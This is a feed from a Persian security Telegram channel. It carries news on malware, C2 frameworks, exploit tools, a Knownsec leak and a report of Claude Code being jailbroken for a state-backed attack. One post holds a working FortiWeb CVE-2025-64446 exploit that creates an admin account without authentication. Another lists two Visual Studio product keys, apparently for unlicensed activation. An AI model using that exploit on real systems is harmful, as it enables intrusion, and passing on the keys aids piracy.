Free Windows software
Detect packer , compiler , protector , .NET obfuscator , PUA application
or
Binary packed data : rar , zip , iso , 7zip , zx , sqz , lz4 , img , ...
@NullError_ir
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - ExeinfoASL/ASL: Free Windows Detector Software
Free Windows Detector Software. Contribute to ExeinfoASL/ASL development by creating an account on GitHub.
بدافزار RondoDox نسخه دوم :
استفاده از ۷۵ اکسپلویت مجزا که نشان دهنده افزایش چند صد درصدی نسبت به نسخه اول این بدافزار است . تمرکز بدافزار از DVR و روترها ، به برنامههای کاربردی سازمانی گسترش یافته است .
اطلاعات بیشتر ...
@NullError_ir
Please open Telegram to view this post
VIEW IN TELEGRAM
Beelzebub
RondoDox v2: Evolution of RondoDox Botnet with 650% More Exploits | AI deception platform
AI deception platform: Deceive, Detect, Respond. “You can’t defend. You can’t prevent. The only thing you can do is detect and respond.” Bruce Schneier. We turn that hard truth into your tactical advantage. Our AI-based decoys, built using our open-source…
بدافزار SleepyDuck : یک تروجان (RAT) پیشرفته که به طور خاص ابزارهایی مانند Cursor و Windsurf را هدف قرار میدهد و از یک قرارداد هوشمند اتریوم برای ماندگاری و (C&C) خود استفاده میکند.
بخوانید ...
@NullError_ir
Please open Telegram to view this post
VIEW IN TELEGRAM
Secure Annex
SleepyDuck malware invades Cursor through Open VSX
The advanced SleepyDuck IDE extension RAT uses Ethereum contracts for persistence.
❤1
یکی از جذاب ترین خبر برای باری کسانی که #باگبانتی کار میکنند یا علاقه دارند به این موضوع
مجموعهای از ایجنت های هوش مصنوعیبه اسم Strix که مثل یک هکر واقعی عمل میکنن! کد شما رو بهصورت پویا اجرا میکنن، حفرههای امنیتی رو پیدا میکنن، و حتی با نمونهی واقعی (Proof-of-Concept) اونها رو تأیید میکنه!
ادامه ...
@NullError_ir
Please open Telegram to view this post
VIEW IN TELEGRAM
X (formerly Twitter)
POURYA (@TheRealPourya) on X
یکی از جذاب ترین خبر برای باری کسانی که #باگبانتی کار میکنند یا علاقه دارند به این موضوع
مجموعهای از ایجنت های هوش مصنوعیبه اسم Strix که مثل یک هکر واقعی عمل میکنن! کد شما رو بهصورت پویا اجرا میکنن، حفرههای امنیتی رو پیدا میکنن، و حتی با نمونهی…
مجموعهای از ایجنت های هوش مصنوعیبه اسم Strix که مثل یک هکر واقعی عمل میکنن! کد شما رو بهصورت پویا اجرا میکنن، حفرههای امنیتی رو پیدا میکنن، و حتی با نمونهی…
❤1
A dependency‑free Python3 Command & Control framework for redteam persistence, built to run on systems without installing packages. It comprises a Flask team server, an Electron operator GUI, and a single‑file Python agent that communicates over HTTP/HTTPS using configurable AES‑encrypted JSON messages. Use it to execute commands, manage files, maintain access, and create SSH reverse tunnels from compromised systems
@NullError_ir
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - boku7/venom: Venom C2 is a dependency‑free Python3 Command & Control framework for redteam persistence
Venom C2 is a dependency‑free Python3 Command & Control framework for redteam persistence - boku7/venom
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - francescopace/espectre: 🛜 ESPectre 👻 - Motion detection system based on Wi-Fi spectre analysis (CSI), with Home Assistant…
🛜 ESPectre 👻 - Motion detection system based on Wi-Fi spectre analysis (CSI), with Home Assistant integration. - francescopace/espectre
Forwarded from 🕸 Articles
JS for Hacker-Volume 1.pdf
9.2 MB
Forwarded from 🕸 Articles
این کتاب رایگان هست و هیچ قیمتی براش نذاشتم. اما اگه دوست داشتید از من حمایت کنید، میتونید از این لینک استفاده کنید:
https://daramet.com/web_articles
همچنین میتونید با به اشتراک گذاشتن کتاب، کمک کنید که بیشتر دیده بشه.
https://daramet.com/web_articles
همچنین میتونید با به اشتراک گذاشتن کتاب، کمک کنید که بیشتر دیده بشه.
Daramet
درگاه حمایت مالی دارمت
درگاه حمایت مالی دارمت به شما کمک میکنه از مخاطب ها، دنبال کنندهها و طرفدارات با امکانات گسترده دونیت دریافت کنی.
Mr. SAM
Photo
VMProtect PE Unpacker.exe
7.9 MB
ظاهرا ابزار جدیدی ( VMPUnpacker ) در فرومهای چینی معرفی شده که قابل قبول کار میکنه ... ( در محیط آزمایشگاهی تست کنید )
@NullError_ir
Please open Telegram to view this post
VIEW IN TELEGRAM
Visual Studio 2026 is here
Keys:
Professional: NVTDK-QB8J9-M28GR-92BPC-BTHXK
Enterprise: VYGRN-WPR22-HG4X3-692BF-QGT2V
Please open Telegram to view this post
VIEW IN TELEGRAM
Microsoft News
Visual Studio 2026 is here: faster, smarter, and a hit with early adopters
Dear developers, We’re thrilled to announce that Visual Studio 2026 is now generally available! This is a moment we’ve built side by side with you. Your feedback has helped shape this release more than any before. Since the introduction of the Insiders Channel…
‼️بزرگترین شرکت امنیت سایبری چین، Knownsec، مورد نفوذ قرار گرفت و جزئیات عملیات سایبری دولت چین فاش شد.
این دادهها شامل اسناد سلاح سایبری، کد منبع ابزار هک داخلی و فهرست اهداف جهانی است که بیش از 20 کشور از جمله ژاپن، ویتنام و هند را پوشش میدهد.
در یک فایل اکسل، فهرستی از ۸۰ سازمان خارجی هکشده، به علاوهی شواهدی از ۹۵ گیگابایت اطلاعات سرقتشدهی مهاجرتی هندیها و ۳ ترابایت اطلاعات تماس از اپراتور تلفن همراه LG U Plus کرهی جنوبی، ارائه شده است.
( در یکی از اسناد به یک پاوربانک مخرب اشاره میکند )
۔Knownsec کلید امنیت سایبری چین است و قابلیتهای دفاعی و تهاجمی پیشرفته، از جمله ابزارهای جاسوسی، را فراهم میکند.
Please open Telegram to view this post
VIEW IN TELEGRAM
❤1
Forwarded from هوش مصنوعی | محمد زمانی
شرکت Anthropic اعلام کرده که یه حمله سایبری خیلی پیچیده رو کشف و متوقف کرده؛ حملهای که برخلاف گذشته، نه توسط یه تیم هکری بزرگ، بلکه بیشتر توسط یه مدل هوش مصنوعی عاملمحور اجرا شده بوده. عامل تهدید هم، طبق ارزیابی Anthropic، یه گروه تحت حمایت دولت چین بوده.
نکته مهم این حمله اینه که مهاجما تونستن ابزار «Claude Code» رو جوری جیلبریک کنن که خودش کارهای لازم رو انجام بده؛ یعنی انتخاب هدف، شناسایی، نوشتن کدهای بهرهبرداری، جمعکردن اعتبارنامهها و حتی استخراج دادههای حساس. طبق گزارش، حدود ۸۰ تا ۹۰ درصد حمله رو خود هوش مصنوعی انجام داده و فقط چند نقطه تصمیمگیری بحرانی توسط انسان مدیریت شده. سرعت کار هم به حدی بالا بوده که عملاً هیچ تیم انسانی نمیتونست باهاش رقابت کنه.
این اتفاق یه پیام روشن داره: با ظهور مدلهای «agentic»، فاصله بین توانایی گروههای حرفهای و گروههای کمتجربه خیلی کم شده. یعنی اگه یه تیم کوچک به این ابزارها دسترسی پیدا کنه، بالقوه میتونه حملاتی در سطح دولتها انجام بده. از اون طرف خود Anthropic هم تأکید میکنه که همین قابلیتها برای دفاع ضروری هستن؛ چون مدلهای قوی میتونن شناسایی حملات، تحلیل کدهای مخرب و مدیریت پاسخ امنیتی رو سریعتر از هر تیم انسانی انجام بدن.
بهطور خلاصه، این پرونده یه هشدار جدیه:
حملههای سایبری داره از “هکرها” به “عاملهای خودمختار هوش مصنوعی” منتقل میشه و سرعت این تغییر خیلی بیشتر از پیشبینیهاست. صنعت امنیت سایبری ناچار میشه همزمان که جلوی سوءاستفاده رو میگیره، خودش هم به شکل گستردهتر از همین فناوری استفاده کنه.
Source
#هوش_مصنوعی
✈️ @mohammad_zammani
📱 @mohammad.zammani.offical
نکته مهم این حمله اینه که مهاجما تونستن ابزار «Claude Code» رو جوری جیلبریک کنن که خودش کارهای لازم رو انجام بده؛ یعنی انتخاب هدف، شناسایی، نوشتن کدهای بهرهبرداری، جمعکردن اعتبارنامهها و حتی استخراج دادههای حساس. طبق گزارش، حدود ۸۰ تا ۹۰ درصد حمله رو خود هوش مصنوعی انجام داده و فقط چند نقطه تصمیمگیری بحرانی توسط انسان مدیریت شده. سرعت کار هم به حدی بالا بوده که عملاً هیچ تیم انسانی نمیتونست باهاش رقابت کنه.
این اتفاق یه پیام روشن داره: با ظهور مدلهای «agentic»، فاصله بین توانایی گروههای حرفهای و گروههای کمتجربه خیلی کم شده. یعنی اگه یه تیم کوچک به این ابزارها دسترسی پیدا کنه، بالقوه میتونه حملاتی در سطح دولتها انجام بده. از اون طرف خود Anthropic هم تأکید میکنه که همین قابلیتها برای دفاع ضروری هستن؛ چون مدلهای قوی میتونن شناسایی حملات، تحلیل کدهای مخرب و مدیریت پاسخ امنیتی رو سریعتر از هر تیم انسانی انجام بدن.
بهطور خلاصه، این پرونده یه هشدار جدیه:
حملههای سایبری داره از “هکرها” به “عاملهای خودمختار هوش مصنوعی” منتقل میشه و سرعت این تغییر خیلی بیشتر از پیشبینیهاست. صنعت امنیت سایبری ناچار میشه همزمان که جلوی سوءاستفاده رو میگیره، خودش هم به شکل گستردهتر از همین فناوری استفاده کنه.
Source
#هوش_مصنوعی
Please open Telegram to view this post
VIEW IN TELEGRAM
نوشتن یک ابزار مبهمساز توسط محقق امنیتی و متخصص مهندسی معکوس خانم ژائو ویتور - ژاپنی .
توسعه ابزار Obfuscator/Deobfuscating از ابتدا ...
@NullError_ir
Please open Telegram to view this post
VIEW IN TELEGRAM
keowu.re
Keowu Blog's
Security Researcher | i like All OS Internals, Malware & Reverse Engineering, C++, Intel/ARM Assembly and cool things.
❤1
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - uziii2208/CVE-2025-33073: Universal exploitation tool for CVE-2025-33073 targeting Windows Domain Controllers with DNSAdmins…
Universal exploitation tool for CVE-2025-33073 targeting Windows Domain Controllers with DNSAdmins privileges and WinRM enabled. - uziii2208/CVE-2025-33073
❤1
CVE-2025-64446 اجرای کد از راه دور بدون احراز هویت در FortiWeb از طریق عبور مسیر و دور زدن احراز هویت CGI
*
*
یعنی بر اساس این
میتوان چنین چیزی به دست آورد:
python3 - <<'PY'
import base64, json, subprocess
header = base64.b64encode(json.dumps({
"username": "admin",
"profname": "prof_admin",
"vdom": "root",
"loginname": "admin"
}).encode()).decode()
payload = json.dumps({
"data": {
"q_type": 1,
"name": "note2",
"access-profile": "prof_admin",
"password": "note2",
"comment": "automated RCE"
}
})
cmd = [
"curl", "--path-as-is", "-sk",
"-H", f"CGIINFO: {header}",
"-H", "Content-Type: application/json",
"--data", payload,
"https://localhost:38443/api/v2.0/cmdb/system/admin%3f/../../../../cgi-bin/fwbcgi"
]
print(subprocess.run(cmd, capture_output=True, text=True).stdout)
PY
خروجی از دستگاه:
{ "results": { "name": "note2", "access-profile": "prof_admin", ... } }
یعنی به سادگی یک ادمین جدید میسازیم ...
Please open Telegram to view this post
VIEW IN TELEGRAM
Gist
FortiWeb Unauthenticated RCE via Path Traversal and CGI Auth Bypass CVE-2025-64446
FortiWeb Unauthenticated RCE via Path Traversal and CGI Auth Bypass CVE-2025-64446 - CVE-2025-64446.md
❤1
Forwarded from Sisoog مرجع متن باز الکترونیک-سیسوگ
📍دوره آموزشی RTL‑SDR در سیسوگ همراه با ویدیوهای آموزشی جذاب قرار گرفت😍🔥
👈#سیسوگ
🖋 تهیه کننده دوره: #edward1stark
📻 رادیو نرمافزاری یا Software Defined Radio (SDR) یکی از جذابترین حوزههای دنیای الکترونیک و مخابرات است. در این مجموعه آموزشی از پایه با ماژول معروف RTL‑SDR آشنا میشوید و یاد میگیرید چگونه یک گیرنده رادیویی دیجیتال واقعی را تنها با یک دانگل ساده بسازید.
✅هدف این دوره، آموزش عملی مفاهیم مخابرات و پردازش سیگنال با ابزار در دسترس است تا بدون تجهیزات گران، بتوانید موجهای رادیویی اطراف خود را دریافت، تحلیل و حتی رمزگشایی کنید. اگر به دنیای RF، SDR و سیگنالهای بیسیم علاقه دارید، این مجموعه بهترین نقطهی شروع شماست.
🌐 لینک مطلب در سیسوگ
📣 عضویت در کانال تلگرام سیسوگ
👈#سیسوگ
🖋 تهیه کننده دوره: #edward1stark
📻 رادیو نرمافزاری یا Software Defined Radio (SDR) یکی از جذابترین حوزههای دنیای الکترونیک و مخابرات است. در این مجموعه آموزشی از پایه با ماژول معروف RTL‑SDR آشنا میشوید و یاد میگیرید چگونه یک گیرنده رادیویی دیجیتال واقعی را تنها با یک دانگل ساده بسازید.
✅هدف این دوره، آموزش عملی مفاهیم مخابرات و پردازش سیگنال با ابزار در دسترس است تا بدون تجهیزات گران، بتوانید موجهای رادیویی اطراف خود را دریافت، تحلیل و حتی رمزگشایی کنید. اگر به دنیای RF، SDR و سیگنالهای بیسیم علاقه دارید، این مجموعه بهترین نقطهی شروع شماست.
🌐 لینک مطلب در سیسوگ
📣 عضویت در کانال تلگرام سیسوگ
سیسوگ
آموزش کامل RTL‑SDR از مقدماتی تا پیشرفته | سری آموزش SDR - سیسوگ
مجموعه ۷ قسمتی آموزش RTL‑SDR در سیسوگ، از معرفی اولیه و نصب نرمافزارهای SDR در ویندوز و لینوکس تا بررسی سختافزار دانگلها و تحلیل سیگنالها را گامبهگام آموزش میدهد.